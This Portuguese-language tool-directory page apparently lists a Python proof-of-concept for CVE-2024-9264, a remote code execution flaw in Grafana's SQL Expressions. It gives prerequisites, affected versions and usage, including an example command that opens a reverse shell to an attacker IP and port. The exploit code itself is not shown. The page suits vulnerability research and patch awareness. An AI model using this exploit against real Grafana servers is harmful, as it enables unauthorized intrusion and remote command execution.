Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9264 — Prova de conceito em Python para execução remota de código no Grafana via Expressões SQL, explorando a sanitização insuficiente de entrada para executar comandos arbitrários de shell em alvos autenticados. | Kitploit
Ferramentas/GitHubGitHub/royall-researchers/cve-2024-9264
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubroyall-researchers/cve-2024-9264

CVE-2024-9264

Prova de conceito em Python para execução remota de código no Grafana via Expressões SQL, explorando a sanitização insuficiente de entrada para executar comandos arbitrários de shell em alvos autenticados.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9264-RCE-Exploit no Grafana via Expressões SQL

Descrição

Prova de Conceito para Execução Remota de Código no Grafana (CVE-2024-9264)

Este repositório contém um script Python que explora uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Expressões SQL do Grafana. Ao aproveitar a sanitização insuficiente de entrada, este exploit permite que um atacante execute comandos arbitrários de shell no servidor. Isso é possível através da extensão comunitária shellfs, que pode ser instalada e carregada por um atacante para facilitar a execução de comandos.

Pré-requisitos

  • usuário autenticado do Grafana com permissões de Viewer ou superiores
  • o binário DuckDB deve estar instalado e acessível através do PATH do Grafana

Versão afetada

Grafana >= v11.0.0 (todas as v11.x.y são afetadas)

Uso

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

Exemplo

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Aviso Legal

Este script é destinado a fins educacionais e para uso em ambientes controlados onde você tem permissão para testar a segurança do sistema. O uso indevido desta ferramenta pode levar a consequências legais.

Mais

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Baixar ferramenta